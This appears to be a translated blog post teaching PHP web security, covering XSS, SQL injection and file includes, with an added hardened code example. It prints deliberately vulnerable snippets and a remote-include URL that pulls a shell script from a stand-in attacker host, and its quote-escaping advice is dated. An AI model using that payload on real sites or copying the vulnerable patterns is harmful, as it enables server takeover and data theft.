Introduction.
While developing my site in PHP, I began to think about its security. Web security. I would not want to wake up one morning and see the inscription "Hacked by %hackername%" on a white background instead of my site, or to find that the entire contents of my site, including the engine that took so long to write, had gone to someone else.
A variety of web vulnerabilities.
So I became interested in vulnerabilities and, of course, in ways to eliminate them.
Basically, all vulnerabilities are classified into several types:
1) XSS attacks
 a) passive XSS
 b) active XSS
2) SQL injection
3) Includes
 a) local
 b) remote
Reconnaissance
Let us consider each of them in a little more detail.
XSS attacks
XSS stands for Cross Site Scripting. Since the abbreviation CSS is already taken by Cascading Style Sheets, XSS is used instead. This vulnerability allows malicious JavaScript code to be executed in the user's browser without their consent by inserting it into the site's HTML.
XSS is divided into passive and active.
Active XSS: the malicious code is stored in a database or file and is displayed directly on the vulnerable site in the browser, for example in message titles, post bodies, etc.
Passive XSS: the malicious code is passed in a GET or POST parameter and displayed on the page; nothing is saved on the server.
For example:
site.ru/page.php?var=
If the var parameter is not filtered in any way and is displayed directly on the page, then a user who follows this link will see a pop-up message. Or, with a suitably crafted request, the attacker will receive that user's cookies.
All XSS vulnerabilities allow one to craft a specific link, slip it to the site's administrator or a user, and obtain their cookies. Such vulnerabilities have existed even on many large sites, VKontakte for example (articles about VKontakte vulnerabilities have appeared here on Habr).
Remedies: apply htmlspecialchars to the fields where necessary, and strictly filter all HTML tags.
SQL injections
SQL injection is a kind of vulnerability that allows an attacker to alter or extend the original SQL query with their own data, which can lead to disclosure of any information in the database or, worse, full access to the server.
Example of vulnerable code:
...
$id=$_GET['id'];                                          // user input taken as-is, no escaping
$query="SELECT * FROM articles WHERE id='".$id."'";       // VULNERABLE: $id is pasted straight into the SQL text
$ret=mysql_query($query);
...
The vulnerable line is the one marked above. If an attacker passes, for example, the value $id = 13', the quotation mark is inserted into the query, which causes an error and makes it possible to extract arbitrary data from the database. (For certain reasons I will not describe the exact methods.)
Also, under some circumstances, an attacker can even execute PHP code, which can lead to very serious consequences.
Ways to address the vulnerability:
1) The most important thing is to filter quotes. Everywhere: in $_GET, $_POST and even $_COOKIE. For example, replace ' with \'.
2) Do not use constructions like ... WHERE id=$id ... in queries; use ... WHERE id='$id' with the quotes filtered in advance.
Includes
An include (inclusion) is a type of vulnerability that makes it possible to display the contents of a particular file on the server, or to insert the contents of a file from another server into the site's page.
Local includes are those where only the contents of files on this server can be displayed. They can be used to obtain configuration files and then gain access to the administrative panel or even the database.
Remote includes are vulnerabilities in which an attacker can, with a specific request, have the contents of a file from a third-party site rendered inside this one. With this, an attacker can insert his malicious script, for example a shell (a script for managing all files on the server, like FTP but through a web page), and gain access to the entire server.
Example of vulnerable code:
site.ru/index.php?page=main.html
Such a harmless request will display the contents of the main.html file on the site's page,
but an attacker can send a request like this:
site.ru/index.php?page=http://evil.ru/shellcode.php
and gain access to the entire server! This would be a remote include.*
* This requires certain server settings.
Without those settings, this include becomes local and allows the contents of any file on the server to be displayed.
...
$page=$_GET['page'];   // user-controlled value
include ($page);       // VULNERABLE: the request parameter is used directly as the include path
...
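As an added example (not code from the original post), here is a hardened rewrite of the two vulnerable fragments above: the article query uses a PDO prepared statement instead of quote filtering, the page include goes through an allowlist, and output is escaped with htmlspecialchars. The DSN, credentials, the pages/ directory and the title column are assumptions.

```php
<?php
// Added example, not the original post's code. Assumes a PDO connection,
// a pages/ directory and an articles table with a title column.

// SQL injection: bind $id as a parameter instead of pasting it into the query.
function fetchArticle(PDO $db, string $id): ?array
{
    // The value travels separately from the SQL text, so a quote in $id
    // (for example 13') cannot change the structure of the query.
    $stmt = $db->prepare('SELECT * FROM articles WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Include: map the request parameter to a fixed list of known pages;
// the user never supplies a path, local or remote.
const ALLOWED_PAGES = [
    'main'    => __DIR__ . '/pages/main.html',     // assumed file
    'contact' => __DIR__ . '/pages/contact.html',  // assumed file
];

function resolvePage(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;   // unknown names are rejected
}

// XSS: escape every user-controlled value at output time.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage; DSN and credentials are placeholders.
$db = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'user', 'password', [
    PDO::ATTR_EMULATE_PREPARES => false,           // real server-side prepares
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

$article = fetchArticle($db, $_GET['id'] ?? '');
echo $article !== null ? '<h1>' . e($article['title']) . '</h1>' : 'Not found';

$file = resolvePage($_GET['page'] ?? 'main');
if ($file === null) {
    http_response_code(404);
} else {
    include $file;
}
```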
Summary.
Of course, these are not all the vulnerabilities that exist in web applications; I have covered only the most important ones, in my opinion.
I will not give real examples of vulnerable sites, in order to avoid trouble, but I think everything is clear.
For now I cannot publish in the thematic blog, but I hope for your help.
Moved to "Information Security"; thank you all.
(c) I